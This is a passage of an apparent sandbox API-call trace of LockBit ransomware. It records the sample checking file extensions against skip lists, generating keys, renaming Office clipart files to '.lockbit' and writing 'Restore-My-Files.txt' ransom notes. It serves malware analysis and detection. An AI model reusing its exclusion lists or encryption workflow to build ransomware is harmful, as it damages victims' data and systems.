[0175.229] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.229] malloc (_Size=0x40068) returned 0x3e70008 [0175.229] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=20970) returned 1 [0175.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0175.230] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.231] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0175.231] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0175.236] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00367_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00367_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.236] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.236] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.237] free (_Block=0x1fa2ed8) [0175.238] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00367_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.238] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.238] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.238] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3308, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00373_.WMF", cAlternateFileName="")) returned 1 [0175.238] lstrcmpiW (lpString1=".", lpString2="SO00373_.WMF") returned -1 [0175.238] lstrcmpiW (lpString1="..", lpString2="SO00373_.WMF") returned -1 [0175.238] PathFindExtensionW (pszPath="SO00373_.WMF") returned=".WMF" [0175.238] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.238] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.238] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.238] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.238] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.238] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.238] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.238] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.238] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.238] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.238] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.239] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.239] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.240] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00373_.WMF") returned -1 [0175.240] lstrcmpiW (lpString1="ntldr", lpString2="SO00373_.WMF") returned -1 [0175.240] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00373_.WMF") returned -1 [0175.240] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00373_.WMF") returned -1 [0175.240] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00373_.WMF") returned -1 [0175.240] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00373_.WMF") returned 1 [0175.240] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00373_.WMF") returned -1 [0175.241] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.241] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00373_.WMF") returned=".WMF" [0175.241] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.241] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.241] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.242] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.242] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.242] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.242] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.242] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.242] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.242] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.242] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.242] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.242] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.242] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.242] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00373_.WMF.lockbit") returned 72 [0175.242] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00373_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00373_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0175.243] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.243] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.243] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=13064) returned 1 [0175.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.245] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.245] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.250] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00373_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00373_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.250] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.250] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.252] free (_Block=0x1fa2ed8) [0175.252] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00373_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.252] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.252] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.252] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b58e00, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x32b58e00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x27f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00382_.WMF", cAlternateFileName="")) returned 1 [0175.252] lstrcmpiW (lpString1=".", lpString2="SO00382_.WMF") returned -1 [0175.252] lstrcmpiW (lpString1="..", lpString2="SO00382_.WMF") returned -1 [0175.252] PathFindExtensionW (pszPath="SO00382_.WMF") returned=".WMF" [0175.252] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.253] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.254] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.254] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.255] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.255] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.255] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.255] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00382_.WMF") returned -1 [0175.255] lstrcmpiW (lpString1="ntldr", lpString2="SO00382_.WMF") returned -1 [0175.255] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00382_.WMF") returned -1 [0175.255] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00382_.WMF") returned -1 [0175.255] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00382_.WMF") returned -1 [0175.255] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00382_.WMF") returned 1 [0175.255] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00382_.WMF") returned -1 [0175.255] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.255] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00382_.WMF") returned=".WMF" [0175.255] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.255] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.255] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.255] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.255] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.255] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.255] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.255] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.256] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.257] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.257] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.257] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00382_.WMF.lockbit") returned 72 [0175.257] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00382_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00382_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0175.258] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.258] malloc (_Size=0x40068) returned 0x3ef0008 [0175.258] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=10228) returned 1 [0175.258] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.259] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0175.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.259] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0175.259] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0175.265] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00382_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00382_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.265] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.265] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.266] free (_Block=0x1fa2ed8) [0175.266] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00382_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.266] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.266] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.267] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27894f00, ftCreationTime.dwHighDateTime=0x1bd4b32, ftLastAccessTime.dwLowDateTime=0x5aa18b10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x27894f00, ftLastWriteTime.dwHighDateTime=0x1bd4b32, nFileSizeHigh=0x0, nFileSizeLow=0xb7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00390_.WMF", cAlternateFileName="")) returned 1 [0175.267] lstrcmpiW (lpString1=".", lpString2="SO00390_.WMF") returned -1 [0175.267] lstrcmpiW (lpString1="..", lpString2="SO00390_.WMF") returned -1 [0175.267] PathFindExtensionW (pszPath="SO00390_.WMF") returned=".WMF" [0175.267] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.267] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.267] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.267] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.267] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.267] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.267] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.267] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.267] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.267] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.267] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.267] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.267] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.267] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.268] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.268] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.269] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.269] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.269] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.269] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.269] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.269] lstrcmpiW 